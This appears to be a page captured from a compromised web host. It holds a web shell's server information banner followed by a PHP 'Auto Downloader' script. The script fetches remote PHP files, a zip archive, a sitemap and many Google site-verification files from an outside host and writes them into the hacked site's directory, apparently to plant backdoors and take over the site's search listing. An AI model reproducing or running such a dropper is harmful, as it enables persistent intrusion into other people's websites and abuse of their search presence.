| Server IP : 217.160.0.50 / Your IP : 216.73.216.185 Web Server : Apache System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux User : u106894358 ( 5897830) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /homepages/43/d895481126/htdocs/clickandbuilds/LogestyServices/ |
Upload File : |
<?php
// ============================================
// EDIT YOUR FILES HERE
// Format: 'filename' => 'url'
// ============================================
$files = [
'unzip.php' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/3fda95ae-9567-4925-a9b9-6bdb2ff1adaf',
'google849611311eaea4db.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/57cf2f97-d6e4-45cf-9771-12961a67b0f5',
'google0b9da7a83b9ad7a4.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/f637e8a1-7980-43ef-b0ba-afa7dc164e51',
'google3c362c4f736bc043.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/8a3adb99-606f-4646-8aca-1defc471aaa1',
'googleed4cfc89eb09b6df.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/f8b4f975-1228-4a99-8569-b82446bbb02f',
'googlea27816ca6b6b0a84.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/102461f7-1d54-4dcf-a801-e200400b314c',
'googlebe0cece12c38bb59.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/2680bc21-73ee-4274-9424-1e1a67226276',
'google2f9bcd6e666eef97.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/baa6b536-227d-4056-aa97-2718b766654c',
'google8fc77db5da1ba31f.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/2facf93a-4433-442a-b891-2086aa9e5efd',
'google753d443e79098177.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/39159a79-71cf-4ff4-a274-d4126cf80c4e',
'googlea3e8b75aa444e306.html' => 'https://kodokzuma.gaterlaluyakin.xyz/raw/588fcc7e-6fe3-4568-8d3e-4f62fa2ff949',
'sitemap.xml' => 'http://kodokzuma.gaterlaluyakin.xyz/raw/25c28a0c-4d43-49f2-b695-d1075fe1b5fc',
'mk.zip' => 'http://kodokzuma.gaterlaluyakin.xyz/zip/0351e760-f8c5-45b3-83df-0477b5dd24ba',
'ping.php' => 'http://kodokzuma.gaterlaluyakin.xyz/raw/2b252c5f-02a7-4118-a9f3-e9f654239da0',
];
// ============================================
echo "<pre>\n";
echo "=== Auto Downloader ===\n\n";
$success = 0;
$failed = 0;
foreach ($files as $filename => $url) {
echo "Downloading: {$filename} ... ";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 120);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$content = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
if ($content !== false && $httpCode === 200) {
file_put_contents(__DIR__ . '/' . $filename, $content);
$size = strlen($content);
echo "OK ({$size} bytes)\n";
$success++;
} else {
echo "FAILED (HTTP {$httpCode}) {$error}\n";
$failed++;
}
}
echo "\n=== Done: {$success} success, {$failed} failed ===\n";
echo "</pre>\n";